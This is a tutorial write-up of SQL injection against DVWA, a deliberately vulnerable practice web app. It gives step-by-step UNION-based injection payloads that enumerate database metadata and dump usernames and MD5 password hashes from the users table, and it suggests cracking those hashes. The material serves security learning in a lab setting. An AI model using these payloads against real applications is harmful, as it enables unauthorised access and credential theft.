DVWA SQL Injection Write-up
Hello There in this Write-up i walk-through one of the famous vulnerability around the internet Globe and yes, that was a SQL Injection.
What is DVWA
What is Damn Vulnerable Web App (DVWA)? Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
SQL Injection
so basically SQL Injection is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
Injection Detail:
Vulnerability: SQL Injection
Difficulty Level : Easy
First will see what is SQL injection is actually
lets Power-up the DVWA and Set difficulties and lets Begin with the following
Input “1” into the text box. Click Submit.
Note, webpage/code is supposed to print ID, First name, and Surname to the screen, Below is the PHP select statement that we will be exploiting, specifically $id.
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;
Always True Scenario
Input the below text into the User ID Textbox (See Picture).
%’ or ‘0’=’0 Click Submit
In this scenario, we are saying display all record that are false and all records that are true. %’ — Will probably not be equal to anything, and will be false. ‘0’=’0' — Is equal to true, because 0 will always equal 0. Database Statement mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0';
Display Database Version
Input the below text into the User ID Textbox (See Picture).
%’ or 0=0 union select null, version() # Click Submit
Notice in the last displayed line, 5.1.60 is displayed in the surname. This is the version of the MySQL database.
Display Database User
Input the below text into the User ID Textbox (See Picture).
%’ or 0=0 union select null, user() #
Notice in the last displayed line, root@localhost is displayed in the surname. This is the name of the database user that executed the behind the scenes PHP code.
Display Database Name
Input the below text into the User ID Textbox (See Picture).
%’ or 0=0 union select null, database() #
Notice in the last displayed line, DVWA is displayed in the surname.
This is the name of the database.
Display All Table information in Information_schema
Input the below text into the User ID Textbox (See Picture).
%’ and 1=0 union select null, table_name from information_schema.tables # Click Submit
Now we are displaying all the tables in the information_schema database.
The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.
Display all the user tables in information_schema
Input the below text into the User ID Textbox (See Picture).
%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’# Click Submit
Now we are displaying all the tables that start with the prefix “user” in the information_schema database.
Display all the columns fields in the information_schema user table
Input the below text into the User ID Textbox (See Picture).
%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ # Click Submit
Now we are displaying all the columns in the users table.
Notice there are a user_id, first_name, last_name, user and Password column.
Display all the columns field contents in the information_schema user table
Input the below text into the User ID Textbox (See Picture).
%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # Click Submit
Now we have successfully displayed all the necessary authentication information into this database.
And That’s it We have a Password hash and it was Encoded in MD5 and you know its Quit Easy. just Decode it and Enjoy the Ultimate user :)
This Hack is Performed With DVWA and it’s Practice application, i wont harm any System for this Hack, and i’m not responsible for any Kind of hack Done by you its Educational Purpose only. B)
I hope You Will Understand the Write-up and Enjoy it
Peace…